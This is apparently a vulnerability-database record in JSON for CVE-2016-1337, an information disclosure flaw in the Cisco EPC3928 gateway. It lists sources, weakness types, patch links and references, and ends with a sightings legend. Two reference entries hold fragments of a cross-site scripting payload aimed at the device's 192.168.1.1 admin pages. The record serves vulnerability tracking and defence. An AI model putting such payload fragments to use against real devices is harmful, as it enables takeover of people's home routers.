"db": "VULHUB",
"id": "VHN-90156",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04560"
},
{
"db": "VULHUB",
"id": "VHN-90156"
},
{
"db": "BID",
"id": "91541"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003416"
},
{
"db": "PACKETSTORM",
"id": "137379"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-294"
},
{
"db": "NVD",
"id": "CVE-2016-1337"
}
]
},
"id": "VAR-201607-0005",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04560"
},
{
"db": "VULHUB",
"id": "VHN-90156"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04560"
}
]
},
"last_update_date": "2024-02-14T22:51:04.023000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Cisco Model DPC3928/EPC3928 DOCSIS/EuroDOCSIS 3.0 8x4 Wireless Residential Gateway with Embedded Digital Voice Adapter User Guide",
"trust": 0.8,
"url": "http://www.cisco.com/c/dam/en/us/td/docs/video/at_home/cable_modems/3900_series/ol-29161-01.pdf"
},
{
"title": "CiscoEPC3928 Information Disclosure Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/78583"
},
{
"title": "Cisco EPC3928 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=62592"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04560"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003416"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-294"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
},
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90156"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003416"
},
{
"db": "NVD",
"id": "CVE-2016-1337"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/"
},
{
"trust": 2.0,
"url": "http://www.securityfocus.com/archive/1/archive/1/538627/100/0/threaded"
},
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/137379/cisco-epc-3928-xss-dos-command-execution.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/91541"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/39904/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1337"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1337"
},
{
"trust": 0.4,
"url": "http://www.cisco.com/"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/index.asp\"\u003e\u003cscript"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/administration.asp"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1337"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/docsis_system.asp"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/goform/docsis_system"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-6401"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/channelsselection.asp"
},
{
"trust": 0.1,
"url": "https://www.youtube.com/watch?v=phsx0s7turo"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-6402"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/docsis_log.asp"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wclientmaclist.asp"
},
{
"trust": 0.1,
"url": "http://secorda.com/)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1328"
},
{
"trust": 0.1,
"url": "http://192.168.1.1\u0027\",totaltime*1000);}mytime=setinterval(\u0027time()\u0027,1000);\u003c/script\u003e\u003c/head\u003e\u003cbody"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04560"
},
{
"db": "VULHUB",
"id": "VHN-90156"
},
{
"db": "BID",
"id": "91541"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003416"
},
{
"db": "PACKETSTORM",
"id": "137379"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-294"
},
{
"db": "NVD",
"id": "CVE-2016-1337"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-04560"
},
{
"db": "VULHUB",
"id": "VHN-90156"
},
{
"db": "BID",
"id": "91541"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003416"
},
{
"db": "PACKETSTORM",
"id": "137379"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-294"
},
{
"db": "NVD",
"id": "CVE-2016-1337"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-07-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-04560"
},
{
"date": "2016-07-03T00:00:00",
"db": "VULHUB",
"id": "VHN-90156"
},
{
"date": "2016-07-03T00:00:00",
"db": "BID",
"id": "91541"
},
{
"date": "2016-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003416"
},
{
"date": "2016-06-08T13:22:22",
"db": "PACKETSTORM",
"id": "137379"
},
{
"date": "2016-06-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-294"
},
{
"date": "2016-07-03T21:59:06.727000",
"db": "NVD",
"id": "CVE-2016-1337"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-07-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-04560"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-90156"
},
{
"date": "2016-07-03T00:00:00",
"db": "BID",
"id": "91541"
},
{
"date": "2016-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003416"
},
{
"date": "2016-07-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-294"
},
{
"date": "2024-02-14T01:17:43.863000",
"db": "NVD",
"id": "CVE-2016-1337"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-294"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco EPC3928 Vulnerability in obtaining critical settings and credentials on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003416"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-294"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…